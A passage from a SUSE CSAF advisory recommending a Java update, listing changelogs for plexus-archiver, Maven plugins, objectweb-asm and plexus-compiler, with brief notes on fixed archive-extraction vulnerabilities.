+ :list-classes does not use GAV parameters
* New Features:
+ Reintroduce the verbose option for dependency:tree
+ List classes in a given artifact
+ dependency:analyze should recommend narrower scope where possible
+ Added analyze parameter 'ignoreUnusedRuntime'
+ Allow ignoring non-test-scoped dependencies
+ Added a <stripType> option to unpack goals
+ Allow auto-ignore of all non-test scoped dependencies used only in test scope
* Improvements:
+ Unused method o.a.m.p.d.t.TreeMojo.containsVersion
+ Minor improvements
+ GitHub Action build improvement
+ dependency:analyze should list the classes that cause a used undeclared dependency
+ Improve documentation of analyze - Non-test scoped
+ Turn warnings into errors instead of failOnWarning
+ maven-dependency-plugin should leverage plexus-build-api to support IDEs
+ TestListClassesMojo logs too much
+ Use outputDirectory from AbstractMavenReport
+ Removed not used dependencies / Replace parts
+ list-repositories - improvements
+ warns about depending on plexus-container-default
+ Replace AnalyzeReportView with a new AnalyzeReportRenderer
* Task:
+ Removed no longer required exclusions
+ Java 1.8 as minimum
+ Explicitly start and end tables with Doxia Sinks in report renderers
+ Replace Maven shared StringUtils with Commons Lang3
+ Removed unused and ignored parameter - useJvmChmod
+ Removed custom plexus configuration
+ Code refactor - UnpackUtil
+ Refresh download page
maven-dependency-tree was updated from version 3.0.1 to 3.2.1:
- Changes in 3.2.1:
* Bugs fixed:
+ DependencyCollectorBuilder does not collect dependencies when artifact has 'war' packaging
+ Transitive provided dependencies are not removed from collected dependency graph
* New Features:
+ DependencyCollectorBuilder more configurable
* Improvements:
+ DependencyGraphBuilder does not provide verbose tree
+ DependencyGraphBuilders shouldn't need reactorProjects for resolving dependencies
+ Maven31DependencyGraphBuilder should not download dependencies other than the pom
+ Fixed `plexus-component-annotation` in line with `plexus-component-metadata`
+ Upgraded parent to 31
+ Added functionality to collect raw dependencies in Maven 3+
+ Annotate DependencyNodes with dependency management metadata
+ Require Java 8
+ Upgrade `org.eclipse.aether:aether-util` dependency in org.apache.maven.shared:maven-dependency-tree
+ Added Exclusions to DependencyNode
+ Made build Reproducible
+ Migrate plexus component to JSR-330
+ Drop maven 3.0 compatibility
* Dependency upgrade:
+ Upgrade shared-component to version 33
+ Upgrade Parent to 36
+ Bump maven-shared-components from 36 to 37
- Removed unnecessary dependency on xmvn tools and parent pom
maven-enforcer was updated to version 3.4.1:
- Update to version 3.4.1:
* Bugs fixed:
+ In a multi module project 'bannedDependencies' rule tries to resolve project artifacts from external repository
+ Require Release Dependencies ignorant about aggregator build
+ banDuplicatePomDependencyVersions does not check managementDependencies
+ Beanshell rule is not thread-safe
+ RequireSnapshotVersion not compatible with CI Friendly Versions (${revision})
+ NPE when using new <?m2e execute ?> syntax with maven-enforcer-plugin
+ Broken links on Maven Enforcer Plugin site
+ RequirePluginVersions not recognizing versions-from-properties
+ [REGRESSION] RequirePluginVersions fails when versions are inherited
+ requireFilesExist rule should be case sensitive
+ Broken Links on Project Home Page
+ TestRequireOS uses hamcrest via transitive dependency
+ plexus-container-default in enforcer-api is very outdated
+ classifier not included in output of failes RequireUpperBoundDeps test
+ Exclusions are not considered when looking at parent for requireReleaseDeps
+ requireUpperBoundDeps does not fail when packaging is 'war'
+ DependencyConvergence in 3.0.0 fails on provided scoped dependencies
+ NPE on requireReleaseDeps with non-matching includes
+ RequireUpperBoundDeps now follow scope provided transitive dependencies
+ Use currently build artifacts in IT tests
+ requireReleaseDeps does not support optional dependencies or runtime scope
+ Enforcer 3.0.0 breaks with Maven 3.8.4
+ Version 3.1.0 is not enforcing bannedDependencies rules
+ DependencyConvergence treats provided dependencies are runtime dependencies
+ Plugin shouldn't use NullPointerException for non-exceptional code flow
+ NPE in RequirePluginVersions
+ ReactorModuleConvergence not cached in reactor
+ RequireUpperBoundDeps fails on provided dependencies since 3.2.1
+ Problematic dependency resolution by new 'banDynamicVersions' rule
+ banTransitiveDependencies: failing if a transitive dependencies has another version than the resolved one
+ Filtering dependency tree by scope
+ Upgrading to 3.0.0 causes 'Could not build dependency tree' with repositories some unknown protocol
+ DependencyConvergence in 3.1.0 fails when using version ranges
+ Semantics of 'ignores' parameter of 'banDynamicVersions' is inverted
+ Omission of 'excludedScopes' parameter of 'banDynamicVersions' causes NPE
+ ENFORCER: plugin-info and mojo pages not found
* New Features:
+ requireUpperBounds deps should have includes
+ Introduce RequireTextFileChecksum with line separator normalization
+ allow no rules
+ show rules processed
+ DependencyConvergence should support including/excluding certain dependencies
+ Support declaring external banned dependencies in an external file/URL
+ Maven enforcer rule which checks that all dependencies have an explicit scope set
+ Maven enforcer rule which checks that all dependencies in dependencyManagement don't have an explicit scope set
+ Rule for no version ranges, version placeholders or SNAPSHOT versions
+ Allow one of many files in RequireFiles rules to pass
+ Skip specific rules
+ New Enforcer API
+ New Enforcer API - RuleConfigProvider
+ Move Built-In Rules to new API
* Improvements:
+ wildcard ignore in requireReleaseDeps
+ Improve documentation about writing own Enforcer Rule
+ RequireActiveProfile should respect inherited activated profiles
+ Upgrade maven-dependency-tree to 3.x
+ Improve dependency resolving in multiple modules project
+ requireUpperBoundDeps: add [<scope>] and colors to the output
+ Example for writing a custom rule should be upgraded
+ Along with JavaVersion, allow enforcement of the JavaVendor
+ Included Java vendor in display-info output
+ requireMavenVersion x.y.z is processed as (,x.y.z] instead of [x.y.z,)
+ Consistently format artifacts same as dependency:tree
+ Made build Reproducible
+ Added support for excludes/includes in requireJavaVendor rule
+ Introduce Maven Enforcer Extension
+ Extends RequirePluginVersions with banMavenDefaults
+ Shared GitHub Actions
+ Log at ERROR level when <fail> is set
+ Reuse getDependenciesToCheck results across rules
+ Violation messages can be really hard to find in a multi module project
+ Clarify class loading for custom Enforcer rules
+ Using junit jupiter bom instead of single artifacts.
+ Get rid of maven-dependency-tree dependency
+ Allow 8 as JDK version for requireJavaVersion
+ Improve error message for rule 'requireJavaVersion'
+ Include Java Home in Message for Java Rule Failures
+ Manage all Maven Core dependencies as provided
+ Mange rules configuration by plugin
+ Deprecate 'rules' property and introduce 'enforcer.rules' as a replacement
+ Change success message from executed to passed
+ EnforcerLogger: Provide isDebugEnabled(), isErrorEnabled(), isWarnEnabled() and isInfoEnabled()
+ Properly declare dependencies
* Test:
+ Regression test for dependency convergence problem fixed in 3.0.0
* Task:
+ Removed reference to travis or switch to travis.com
+ Fixed maven assembly links
+ Require Java 8
+ Verify working with Maven 4
+ Code cleanup
+ Refresh download page
+ Deprecate display-info mojo
+ Refresh site descriptors
+ Superfluous blanks in BanDuplicatePomDependencyVersions
+ Rename ResolveUtil to ResolverUtil
maven-plugin-tools was updated from version 3.6.0 to version 3.9.0:
- Changes of version 3.9.0:
* Bugs fixed:
+ Fixed *-mojo.xml (in PluginXdocGenerator) is overwritten when multiple locales are defined
+ Generated table by PluginXdocGenerator does not contain default attributes
* Improvements:
+ Omit empty line in generated help goal output if plugin description is empty
+ Use Plexus I18N rather than fiddling with
* Task:
+ Removed reporting from maven-plugin-plugin: create maven-plugin-report-plugin
* Dependency upgrade:
+ Upgrade plugins and components (in ITs)
- Changes of version 3.8.2:
* Improvements:
+ Used Resolver API, get rid of localRepository
* Dependency upgrade:
+ Bump httpcore from 4.4.15 to 4.4.16
+ Bump httpclient from 4.5.13 to 4.5.14
+ Bump antVersion from 1.10.12 to 1.10.13
+ Bump slf4jVersion from 1.7.5 to 1.7.36
+ Bump plexus-java from 1.1.1 to 1.1.2
+ Bump plexus-archiver from 4.6.1 to 4.6.3
+ Bump jsoup from 1.15.3 to 1.15.4
+ Bump asmVersion from 9.4 to 9.5
+ Bump assertj-core from 3.23.1 to 3.24.2
- Changes of version 3.8.1:
* Bugs fixed:
+ Javadoc reference containing a link label with spaces are not detected
+ JavadocLinkGenerator.createLink: Support nested binary class names
+ ERROR during build of m-plugin-report-p and m-plugin-p: Dependencies in wrong scope
+ 'Executes as an aggregator plugin' documentation: s/plugin/goal/
+ Maven scope warning should be logged at WARN level
+ Fixed Temporary File Information Disclosure Vulnerability
* New features:
+ Support mojos using the new maven v4 api
* Improvements:
+ Plugin descriptor should contain the requiredJavaVersion/requiredMavenVersion
+ Execute annotation only supports standard lifecycle phases due to use of enum
+ Clarify deprecation of all extractors but the maven-plugin-tools-annotations
* Dependency upgrade:
+ Update to Maven Parent POM 39
+ Bump junit-bom from 5.9.1 to 5.9.2
+ Bump plexus-archiver from 4.5.0 to 4.6.1
- Changes of version 3.7.1:
* Bugs fixed:
+ Maven scope warning should be logged at WARN level
- Changes of version 3.7.0:
* Bugs fixed:
+ The plugin descriptor generated by plugin:descriptor does not consider @ see javadoc taglets
+ Report-Mojo doesn't respect input encoding
+ Generating site reports for plugin results in
NoSuchMethodError
+ JDK Requirements in plugin-info.html: Consider property 'maven.compiler.release'
+ Parameters documentation inheriting @ since from Mojo can be confusing
+ Don't emit warning for missing javadoc URL of primitives
+ Don't emit warning for missing javadoc URI if no javadoc sources are configured
+ Parameter description should be taken from annotated item
* New Features:
+ Added link to javadoc in configuration description page for user defined types of Mojos.
+ Allow only @ Deprecated annotation without @ deprecated javadoc tag
+ add system requirements history section
+ report: allow to generate usage section in plugin-info.html with true
+ Allow @ Parameter on setters methods
+ Extract plugin report into its own plugin
+ report: Expose generics information of Collection and Map types
* Improvement:
+ plugin-info.html should contain a better Usage section
+ Do not overwrite generate files with no content change
+ Upgrade to JUnit 5 and @ Inject annotations
+ Support for java 20 - ASM 9.4
+ Don't print empty Memory, Disk Space in System Requirements
+ simplification in helpmojo build
+ Get rid of plexus-compiler-manager from tests
+ Use Maven core artifacts in provided scope
+ report and descriptor goal need to evaluate Javadoc comments differently
+ Allow to reference aggregator javadoc from plugin report
* Task:
+ Detect legacy/javadoc Mojo definitions, warn to use Java 5 annotations
+ Update level to Java 8
+ Deprecate scripting support for mojos
+ Deprecate requirements parameter in report Mojo
+ Removed duplicate code from PluginReport
+ Prepare for Doxia (Sitetools) 2.0.0
+ Fixed documentation for maven-plugin-report-plugin
+ Removed deprecated items from new maven-plugin-report-plugin
+ Improve site build
+ Improve dependency management
+ Plugin generator generation fails when the parent class comes from a different project
* Dependency upgrade:
+ Upgrade Maven Reporting API/Impl to 3.1.0
+ Upgrade Parent to 36
+ Upgrade project dependencies after JDK 1.8
+ Bump maven-parent from 36 to 37
+ Upgrade Maven Reporting API to 3.1.1/Maven Reporting Impl to 3.2.0
+ Upgrade plexus-utils to 3.5.0
- Changes of version 3.6.4:
* Restored compatibility with Maven 3 ecosystem
* Upgraded dependencies
- Changes of version 3.6.3:
* Added prerequisites to plugin pom
* Exclude dependency in provided scope from plugin descriptor
* Get rid of String.format use
* Fixed this logging as well
* Simplify documentation
* Exclude maven-archiver and maven-jxr from warning
- Changes of version 3.6.2:
* Deprecated unused requiresReports flag
* Check that Maven dependencies are provided scope
* Update ITs
* Use shared gh action
* Deprecate unsupported Mojo descriptor items
* Weed out ITs
* Upgrade to maven 3.x and avoid using deprecated API
* Drop legacy dependencies
* Use shared gh action - v1
* Fixed wording in javadoc
- Changes of version 3.6.1:
* What's Changed:
* Added missing @OverRide and make methods static
* Upgraded to JUnit 4.12
* Upgraded parent POM and other dependencies
* Updated plugins
* Upgraded Doxia Sitetools to 1.9.2 to remove dependency on Struts
* removed Maven 2 info
* Removed unneeded dependency
* Tighten the dependency tree
* Ignore .checkstyle
* Strict dependencies for maven-plugin-tools-annotations
* Improved @execute(goal...) docs
* Improve @execute(lifecycle...) docs
plexus-compiler was updated from version 2.11.1 to 2.14.2:
- Changes of 2.14.2:
* Removed:
+ Drop J2ObjC compiler
* New features and improvements:
+ Update AspectJ Compiler to 1.9.21 to support Java 21
+ Require JDK 17 for build
+ Improve locking on JavacCompiler
+ Include 'parameter' and 'preview' describe log
+ Switch to SISU annotations and plugin, fixes #217
+ Support jdk 21
+ Require Maven 3.5.4+
+ Require Java 11 for plexus-compiler-eclipse an
javac-errorprone and aspectj compilers
+ Added support to run its with Java 20
* Bugs fixed:
+ Fixed javac memory leak
+ Validate zip file names before extracting (Zip Slip)
+ Restore AbstractCompiler#getLogger() method
+ Return empty list for not existing source root location
+ Improve javac error output parsing
- Changes of 2.13.0:
* New features and improvements:
+ Fully ignore any possible jdk bug
+ MCOMPILER-402: Added implicitOption to CompilerConfiguration
+ Added a custom compile argument
replaceProcessorPathWithProcessorModulePath to force the
plugin replace processorPath with processormodulepath
+ describe compiler configuration on run
+ simplify 'Compiling' info message: display relative path
* Bugs fixed:
+ Respect CompilerConfiguration.sourceFiles in
EclipseJavaCompiler
+ Avoid NPE in AspectJCompilerTest on AspectJ 1.9.8+
* Dependency updates:
+ Bump maven-surefire-plugin from 3.0.0-M5 to 3.0.0-M6
+ Bump error_prone_core from 2.11.0 to 2.13.1
+ Bump github/codeql-action from 1 to 2
+ Bump ecj from 3.28.0 to 3.29.0
+ Bump release-drafter/release-drafter from 5.18.1 to 5.19.0
+ Bump ecj from 3.29.0 to 3.30.0
+ Bump maven-invoker-plugin from 3.2.2 to 3.3.0
+ Bump maven-enforcer-plugin from 3.0.0 to 3.1.0
+ Bump error_prone_core from 2.13.1 to 2.14.0
+ Bump maven-surefire-plugin from 3.0.0-M6 to 3.0.0-M7
+ Bump ecj from 3.31.0 to 3.32.0
+ Bump junit-bom from 5.9.0 to 5.9.1
+ Bump ecj from 3.30.0 to 3.31.0
+ Bump groovy from 3.0.12 to 3.0.13
+ Bump groovy-json from 3.0.12 to 3.0.13
+ Bump groovy-xml from 3.0.12 to 3.0.13
+ Bump animal-sniffer-maven-plugin from 1.21 to 1.22
+ Bump error_prone_core from 2.14.0 to 2.15.0
+ Bump junit-bom from 5.8.2 to 5.9.0
+ Bump groovy-xml from 3.0.11 to 3.0.12
+ Bump groovy-json from 3.0.11 to 3.0.12
+ Bump groovy from 3.0.11 to 3.0.12
* Maintenance:
+ Require Maven 3.2.5
Patchnames
SUSE-2024-560,SUSE-SLE-Module-Basesystem-15-SP5-2024-560,SUSE-SLE-Module-Development-Tools-15-SP5-2024-560,SUSE-SLE-Module-SUSE-Manager-Server-4.3-2024-560,SUSE-SLE-Product-HPC-15-SP2-LTSS-2024-560,SUSE-SLE-Product-HPC-15-SP3-LTSS-2024-560,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2024-560,SUSE-SLE-Product-HPC-15-SP4-LTSS-2024-560,SUSE-SLE-Product-SLED-15-SP4-LTSS-2024-560,SUSE-SLE-Product-SLES-15-SP2-LTSS-2024-560,SUSE-SLE-Product-SLES-15-SP3-LTSS-2024-560,SUSE-SLE-Product-SLES-15-SP4-LTSS-2024-560,SUSE-SLE-Product-SLES_SAP-15-SP2-2024-560,SUSE-SLE-Product-SLES_SAP-15-SP3-2024-560,SUSE-SLE-Product-SLES_SAP-15-SP4-2024-560,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2024-560,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2024-560,SUSE-Storage-7.1-2024-560,openSUSE-SLE-15.5-2024-560
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Recommended update for Java",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for Java fixes the following issues:\n\nplexus-archiver was updated from version 4.2.1 to 4.8.0:\n\n- Changes of 4.8.0:\n\n * Security issues fixed:\n\n + CVE-2023-37460: Avoid override target symlink by standard file in AbstractUnArchiver (bsc#1215973)\n\n * New features and improvements:\n\n + Added tzst alias for tar.zst archiver/unarchived\n\n * Bugs fixed:\n\n + Detect permissions for addFile\n\n * Maintenance:\n\n + Removed public modifier from JUnit 5 tests\n + Use https in scm/url\n + Removed junit-jupiter-engine from project dependencies\n + Removed parent and reports menu from site\n + Cleanup after \u0027veryLargeJar\u0027 test\n + Override project.url\n\n- Changes of 4.7.1:\n\n * Bugs fixed:\n\n + Don\u0027t apply umask on unknown perms (Win)\n\n- Changes of 4.7.0:\n\n * New features and improvements:\n\n + add umask support and use 022 in RB mode\n + Use NIO Files for creating temporary files\n + Deprecate the JAR Index feature (JDK-8302819)\n + Added Archiver aliases for tar.*\n\n * Maintenance:\n\n + Use JUnit TempDir to manage temporary files in tests\n + Override uId and gId for Tar in test\n + Bump maven-resources-plugin from 2.7 to 3.3.1\n\n- Changes of 4.6.3:\n\n * New features and improvements:\n\n + Fixed path traversal vulnerability\n The vulnerability affects only directories whose name begins\n with the same prefix as the destination directory. For example\n malicious archive may extract file in /opt/directory instead\n of /opt/dir.\n\n- Changes of 4.6.2:\n\n * Bugs fixed:\n\n + Fixed regression in handling symbolic links\n\n- Changes of 4.6.1:\n\n * Bugs fixed:\n\n + Normalize file separators before warning about equal archive entries\n\n- Changes of 4.6.0:\n\n * New features and improvements:\n\n + keep file/directory permissions in Reproducible Builds mode\n\n- Changes of 4.5.0:\n\n * New features and improvements:\n\n + Added zstd (un)archiver support\n\n * Bugs fixed:\n\n + Fixed UnArchiver#isOverwrite not working as expected\n\n- Changes of 4.4.0:\n\n * New features and improvements:\n\n + Drop legacy plexus API and use only JSR330 components\n\n- Changes of 4.3.0:\n\n * New features and improvements:\n\n + Require Java 8\n + Refactor to use FileTime API\n + Rename setTime method to setZipEntryTime\n + Convert InputStreamSupplier to lambdas\n\n * Bugs fixed:\n\n + Reproducible Builds not working when using modular jar\n\n- Changes of 4.2.7:\n\n * New features and improvements:\n\n + Respect order of META-INF/ and META-INF/MANIFEST.MF entries in a JAR file\n\n- Changes of 4.2.6:\n\n * New features and improvements:\n\n + FileInputStream, FileOutputStream, FileReader and FileWriter are no longer used\n + Code cleanup\n\n- Changes of 4.2.5:\n\n * New features and improvements:\n + Speed improvements\n\n * Bugs fixed:\n\n + Fixed use of a mismatching Unicode path extra field in zip unarchiving\n\n- Changes of 4.2.4:\n\n * Bugs fixed:\n\n + Fixed unjustified warning about casing for directory entries\n\n- Changes of 4.2.2:\n\n * Bugs fixed:\n\n + DirectoryArchiver fails for symlinks if a parent directory doesn\u0027t exist\n\nobjectweb-asm was updated to version 9.6:\n\n- Changes of version 9.6:\n\n * New Opcodes.V22 constant for Java 22\n\n * Bugs fixed:\n\n + Analyzer produces frames that have different locals than those detected by JRE bytecode verifier\n + Invalid stackmap generated when the instruction stream has new instruction after invokespecial to \u003cinit\u003e\n + Analyzer can fail to catch thrown exceptions\n + `asm-analysis` Frame allocates an array unnecessarily inside `executeInvokeInsn`\n + Fixed bug in `CheckFrameAnalyzer` with static methods\n\n- Changes of version 9.5:\n\n * New Opcodes.V21 constant for Java 21\n * New readBytecodeInstructionOffset hook in ClassReader\n * Added more detailed exception messages\n * Javadoc improvements and fixes\n\n * Bugs fixed:\n\n + Silent removal of zero-valued entries from the line-number table\n\n- Changes of version 9.4:\n\n * Changes:\n\n + New Opcodes.V20 constant for Java 20\n + Added more checks in CheckClassAdapter\n + Javadoc improvements and fixes\n + `module-info` classes can be built without Gradle and Bnd\n + Parent POM updated to `org.ow2:ow2:1.5.1`\n\n * Bugs fixed:\n\n +`CheckClassAdapter` is no longer transparent for MAXLOCALS\n + Added public `getDelegate` method to all visitor classes\n + Analyzer does not compute optimal maxLocals for static methods\n + Fixed `SignatureWriter` when a generic type has a depth over 30\n + Skip remap inner class name if not changed in Remapper\n\nmaven-archiver was updated from version 3.5.0 to 3.6.1:\n\n- Changes of 3.6.1:\n\n * New Features:\n\n + Deprecated the JAR Index feature (JDK-8302819)\n\n * Task:\n\n + Refreshed download page\n + Prefer JDK features over plexus-utils, plexus-io\n\n- Changes of 3.6.0:\n\n * Task:\n\n + Require Java 8\n + Drop m-shared-utils from deps\n\nmaven-assembly-plugin was updated from version 3.3.0 to 3.6.0:\n\n- Changes of 3.6.0:\n\n * Bugs fixed:\n\n + finalName as readonly parameter makes common usecases very complicated\n + Symbolic links get copied with absolute path\n + Warning if using Maven 3.9.1\n + Minimal default Manifest configuration of jar archiver should be respected\n\n * New Features:\n\n + Support Zstandard compression format\n\n * Improvements:\n\n + In RB mode, apply 022 umask to ignore environment group write umask\n + Added system requirements history\n\n * Task:\n + Dropped deprecated repository element\n + Support running build on Java 20\n + Refresh download page\n + Cleanup declared dependencies\n + Avoid using deprecated methods of `plexus-archiver`\n\n- Changes of 3.5.0:\n\n * Bugs fixed:\n\n + File permissions removed during assembly:single since 3.2.0\n\n- Changes of 3.4.2:\n\n * Bugs fixed:\n\n + Fixed Excludes filtering\n\n * Task:\n\n + Fixed examples to refer to https instead of http\n\n- Changes of 3.4.1:\n\n * Bugs fixed:\n\n + Fixed error build with shared assemblies\n\n- Changes of 3.4.0:\n\n * Bugs fixed:\n\n + dependencySet includes filter with classifier breaks include of artifacts without classifier\n\n * Task:\n\n + Speed improvements\n + Update plugin (requires Maven 3.2.5+)\n + Assembly plugin resolves too much, even plugins used to build dependencies\n + Deprecated the repository element in assembly descriptor\n + Upgraded to Java 8, drop unused dependencies\n\nmaven-common-artifact-filters was updated from version 3.0.1 to 3.3.2:\n\n- Changes of 3.3.2:\n\n * Bugs fixed:\n\n + PatternIncludesArtifactFilters raising NPE for patterns w/ wildcards and artifactoid w/ null on any coordinate\n\n- Changes of 3.3.1:\n\n * Bugs fixed:\n\n + Pattern w/ 4 elements may be GATV or GATC\n\n- Changes of 3.3.0:\n\n * Bugs fixed:\n\n + null passed to DependencyFilter in EclipseAetherFilterTransformerTest\n + PatternIncludesArtifactFilter#include(Artifact)\n + Common Artifact Filters pattern parsing with classifier is broken\n\n * Task:\n\n + Sanitized dependencies\n + Upgraded to Maven Parent 36, to Maven 3.2.5, to Java 8 and clean up dependencies\n\n- Changes of 3.2.0:\n\n * Improvements:\n\n + Big speed improvements for patterns that do not contain any wildcard\n\n- Changes of 3.1.1:\n\n * Bugs fixed:\n\n + Updated JIRA URL for maven-common-artifact-filters\n\n * Improvements:\n\n + Made build Reproducible\n\n- Changes of 3.1.0:\n\n * Bugs fixed:\n\n + Several filters do not preserve order of artifacts filtered\n\nmaven-compiler-plugin was updated from version 3.10.1 to 3.11.0:\n\nChanges of 3.11.0:\n\n * New features and improvements:\n\n + Added a useModulePath switch to the testCompile mojo\n + Allow dependency exclusions for \u0027annotationProcessorPaths\u0027\n + Use maven-resolver to resolve \u0027annotationProcessorPaths\u0027 dependencies\n + Upgrade plexus-compiler to improve compiling message\n + compileSourceRoots parameter should be writable\n + Change showWarnings to true by default\n + Warn about warn-config conflicting values\n + Update default source/target from 1.7 to 1.8\n + Display recompilation causes\n + Added some parameter to pattern from stale source calculation\n + Added dedicated option for implicit javac flag\n\n * Bugs fixed:\n\n + Fixed incorrect detection of dependency change\n + Test with Maven 3.9.0 and fix the failing IT\n + Resolved all annotation processor dependencies together\n + Defining maven.compiler.release as empty string ends with NumberFormatException in testCompileMojo\n + Fixed missing dirs in createMissingPackageInfoClasses\n + Set Xcludes in config passed to actual compiler\n\nmaven-dependency-analyzer was updated from version 1.10 to 1.13.2:\n\n- Changes of 1.13.2:\n\n * Changes and bugs fixed:\n\n + Made mvn dependency:analyze work with OpenJDK 11\n + Fixed jdk8 incompatibility at runtime (NoSuchMethodError)\n + Upgraded asm to 8.0.1\n + Use try with resources to avoid leaks\n + dependency:analyze recommends test scope for test-only artifacts that have non-test scope\n + remove reference to deprecated public mutable field\n + Updated JIRA URL\n + dependency:analyze should recommend narrower scope where possible\n + Remove dependency on jmock\n + Inline deprecated field\n + Added more JavaDoc\n + Handle different classes from same artifact used by model and test code\n + Included class names in used undeclared dependencies\n + Check maximum allowed Maven version\n + Get rid of maven-plugin-testing-tools for IT test\n + Require Maven 3.2.5+\n + Analyze project classes only once\n + Fixed array parsing\n + CONSTANT_METHOD_TYPE should not add to classes\n + Inner classes are in same compilation unit as container class\n + Upgraded Parent to 36\n + Cleanup IT tests\n + Replace Codehaus Plexus utils with java.nio.file.Files and Apache Commons\n + Fixed bug with \u0027non-test scoped test only dependencies found\u0027\n + Bump asm from 9.4 to 9.5\n + Refresh download page\n + Upgrade Parent to 39\n + Build on JDK 19, 20\n + Prefer JDK classes to Plexus utils\n + Replaced System.out by logger\n + Fixed java.lang.RuntimeException: Unknown constant pool type\n + Switched to JUnit 5\n + Dependency improvements\n\nmaven-dependency-plugin was updated from version 3.1.2 to 3.6.0:\n\n- Changes in 3.6.0:\n\n * Bugs fixed:\n\n + Obsolete example of -Dverbose on web page\n + Unsupported verbose option still appears in docs\n + dependency:go-offline does not use repositories from parent pom in reactor build\n + Fixed possible NPE\n + `dependency:analyze-only` goal fails on OpenJDK 14\n + FileWriter and FileReader should be replaced\n + Dependency Plugin go-offline doesn\u0027t respect artifact classifier\n + analyze-only failed: Unsupported class file major version 60 (Java 16)\n + analyze-only failed: Unsupported class file major version 61 (Java 17)\n + copy-dependencies fails when using excludeScope=test\n + mvn dependency:analyze detected wrong transitive dependency\n + dependency plugin does not work with JDK 16\n + skip dependency analyze in ear packaging\n + Non-test dependency reported as Non-test scoped test only dependency\n + \u0027Dependency not found\u0027 with 3.2.0 and Java-17 while analyzing\n + Tree plugin does not terminate with 3.2.0\n + Minor improvement - continue\n + analyze-only failed: PermittedSubclasses requires ASM9\n + Broken Link to \u0027Introduction to Dependency Mechanism Page\u0027\n + Sealed classes not supported\n + Dependency tree in verbose mode for war is empty\n + Javadoc was not updated to reflect that :tree\u0027s verbose option is now ok\n + error dependency:list (caused by postgresql dependency)\n + :list-classes does not skip if skip is set\n + :list-classes does not use GAV parameters\n\n * New Features:\n\n + Reintroduce the verbose option for dependency:tree\n + List classes in a given artifact\n + dependency:analyze should recommend narrower scope where possible\n + Added analyze parameter \u0027ignoreUnusedRuntime\u0027\n + Allow ignoring non-test-scoped dependencies\n + Added a \u003cstripType\u003e option to unpack goals\n + Allow auto-ignore of all non-test scoped dependencies used only in test scope\n\n * Improvements:\n\n + Unused method o.a.m.p.d.t.TreeMojo.containsVersion\n + Minor improvements\n + GitHub Action build improvement\n + dependency:analyze should list the classes that cause a used undeclared dependency\n + Improve documentation of analyze - Non-test scoped\n + Turn warnings into errors instead of failOnWarning\n + maven-dependency-plugin should leverage plexus-build-api to support IDEs\n + TestListClassesMojo logs too much\n + Use outputDirectory from AbstractMavenReport\n + Removed not used dependencies / Replace parts\n + list-repositories - improvements\n + warns about depending on plexus-container-default\n + Replace AnalyzeReportView with a new AnalyzeReportRenderer\n\n * Task:\n\n + Removed no longer required exclusions\n + Java 1.8 as minimum\n + Explicitly start and end tables with Doxia Sinks in report renderers\n + Replace Maven shared StringUtils with Commons Lang3\n + Removed unused and ignored parameter - useJvmChmod\n + Removed custom plexus configuration\n + Code refactor - UnpackUtil\n + Refresh download page\n\nmaven-dependency-tree was updated from version 3.0.1 to 3.2.1:\n\n- Changes in 3.2.1:\n\n * Bugs fixed:\n\n + DependencyCollectorBuilder does not collect dependencies when artifact has \u0027war\u0027 packaging\n + Transitive provided dependencies are not removed from collected dependency graph\n\n * New Features:\n\n + DependencyCollectorBuilder more configurable\n\n * Improvements:\n\n + DependencyGraphBuilder does not provide verbose tree\n + DependencyGraphBuilders shouldn\u0027t need reactorProjects for resolving dependencies\n + Maven31DependencyGraphBuilder should not download dependencies other than the pom\n + Fixed `plexus-component-annotation` in line with `plexus-component-metadata`\n + Upgraded parent to 31\n + Added functionality to collect raw dependencies in Maven 3+\n + Annotate DependencyNodes with dependency management metadata\n + Require Java 8\n + Upgrade `org.eclipse.aether:aether-util` dependency in org.apache.maven.shared:maven-dependency-tree\n + Added Exclusions to DependencyNode\n + Made build Reproducible\n + Migrate plexus component to JSR-330\n + Drop maven 3.0 compatibility\n\n * Dependency upgrade:\n\n + Upgrade shared-component to version 33\n + Upgrade Parent to 36\n + Bump maven-shared-components from 36 to 37\n\n- Removed unnecessary dependency on xmvn tools and parent pom\n\nmaven-enforcer was updated to version 3.4.1:\n\n- Update to version 3.4.1:\n\n * Bugs fixed:\n\n + In a multi module project \u0027bannedDependencies\u0027 rule tries to resolve project artifacts from external repository\n + Require Release Dependencies ignorant about aggregator build\n + banDuplicatePomDependencyVersions does not check managementDependencies\n + Beanshell rule is not thread-safe\n + RequireSnapshotVersion not compatible with CI Friendly Versions (${revision})\n + NPE when using new \u003c?m2e execute ?\u003e syntax with maven-enforcer-plugin\n + Broken links on Maven Enforcer Plugin site\n + RequirePluginVersions not recognizing versions-from-properties\n + [REGRESSION] RequirePluginVersions fails when versions are inherited\n + requireFilesExist rule should be case sensitive\n + Broken Links on Project Home Page\n + TestRequireOS uses hamcrest via transitive dependency\n + plexus-container-default in enforcer-api is very outdated\n + classifier not included in output of failes RequireUpperBoundDeps test\n + Exclusions are not considered when looking at parent for requireReleaseDeps\n + requireUpperBoundDeps does not fail when packaging is \u0027war\u0027\n + DependencyConvergence in 3.0.0 fails on provided scoped dependencies\n + NPE on requireReleaseDeps with non-matching includes\n + RequireUpperBoundDeps now follow scope provided transitive dependencies\n + Use currently build artifacts in IT tests\n + requireReleaseDeps does not support optional dependencies or runtime scope\n + Enforcer 3.0.0 breaks with Maven 3.8.4\n + Version 3.1.0 is not enforcing bannedDependencies rules\n + DependencyConvergence treats provided dependencies are runtime dependencies\n + Plugin shouldn\u0027t use NullPointerException for non-exceptional code flow\n + NPE in RequirePluginVersions\n + ReactorModuleConvergence not cached in reactor\n + RequireUpperBoundDeps fails on provided dependencies since 3.2.1\n + Problematic dependency resolution by new \u0027banDynamicVersions\u0027 rule\n + banTransitiveDependencies: failing if a transitive dependencies has another version than the resolved one\n + Filtering dependency tree by scope\n + Upgrading to 3.0.0 causes \u0027Could not build dependency tree\u0027 with repositories some unknown protocol\n + DependencyConvergence in 3.1.0 fails when using version 